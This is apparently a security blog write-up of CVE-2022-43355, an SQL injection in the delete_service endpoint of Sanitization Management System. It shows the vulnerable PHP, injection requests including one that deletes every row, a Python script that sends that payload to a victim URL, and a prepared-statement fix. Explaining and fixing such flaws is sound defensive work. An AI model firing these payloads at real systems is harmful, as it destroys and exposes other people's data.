Published: June 2024
Author: AI Security Analyst
Sanitization Management System v1. is a web application widely used for handling cleaning service bookings and management, especially across schools and business setups. In late 2022, a serious security issue was discovered and registered as CVE-2022-43355: an unauthenticated SQL injection vulnerability in the /php-sms/classes/Master.php?f=delete_service endpoint.
This exclusive deep-dive will walk you through what this vulnerability is, how the exploit works (with code snippets), possible consequences, and how to stay safe.
What is SQL Injection?
SQL Injection happens when user input is not properly filtered, and an attacker tricks the software into running malicious SQL queries directly on the database. This can result in:
Where's the Problem?
On Sanitization Management System v1., there’s a “delete_service” AJAX functionality designed to delete service records via HTTP GET or POST request:
/php-sms/classes/Master.php?f=delete_service&id=#
The id parameter is supposed to only contain a number (the service ID), but the app fails to properly check user input.
The Official Disclosure & References
- NVD Entry: CVE-2022-43355
- Vuldb Advisory
- Exploit-DB
Let’s look at a simplified example (found inside Master.php)
// (Excerpt from /php-sms/classes/Master.php)
$id = $_GET['id']; // or $_POST['id']
$query = "DELETE FROM services WHERE id = $id";
$result = $conn->query($query);
There is no sanitization or prepared statement. Whatever you send in the id parameter is included as raw SQL.
How to Test the Vulnerability
Let’s test if it’s possible to inject dangerous SQL. For example, the following request can be sent with a modern tool like curl:
Benign Request (normal case)
GET /php-sms/classes/Master.php?f=delete_service&id=5
Malicious Request (SQLi attempt)
GET /php-sms/classes/Master.php?f=delete_service&id=5%20OR%201=1
This results in an SQL command equivalent to
DELETE FROM services WHERE id = 5 OR 1=1
Which deletes all rows in the "services" table!
Extracting Data with SQL Injection
You can often turn deletion statements into data-leak attempts with UNION SELECT or see database errors to get table or column names.
Sending
GET /php-sms/classes/Master.php?f=delete_service&id=; SELECT @@version --
Might error out and show the MySQL version in an error message (if errors are being displayed).
Here’s a small Python script to automate basic injection checks
import requests
target = 'http://victim-site.com/php-sms/classes/Master.php';
payload = '1 OR 1=1'
params = {'f':'delete_service', 'id':payload}
response = requests.get(target, params=params)
if response.status_code == 200:
print("Payload sent. Check if table records vanished!")
print("Server Response:", response.text)
else:
print("Something went wrong.")
Note: Do not use this script on systems you don’t own or have permission to test!
Data Theft: If error messages are verbose, attacker could gain insight into database structure.
- Privilege Escalation: Depending on what else is in the database, further attacks may be possible.
How to Fix It
The right fix is to sanitize all user input and use prepared statements.
Safe Example
$id = intval($_GET['id']); // Ensures id is a number.
$stmt = $conn->prepare("DELETE FROM services WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
Or, for extra safety, check if the method is even allowed and restrict input strictly.
Conclusion
CVE-2022-43355 is a dangerous but preventable SQL injection bug in the Sanitization Management System. If you’re running v1., check your application and apply all available updates or fixes ASAP.
Stay Secure!
If you found this post useful, share or contact us for more exclusive web security digests. Happy hacking (legally and ethically)!
Original Advisory & Resources:
- NVD CVE-2022-43355
- Vuldb.com
- Exploit-db
Timeline
Published on: 11/01/2022 01:15:00 UTC
Last modified on: 11/01/2022 17:30:00 UTC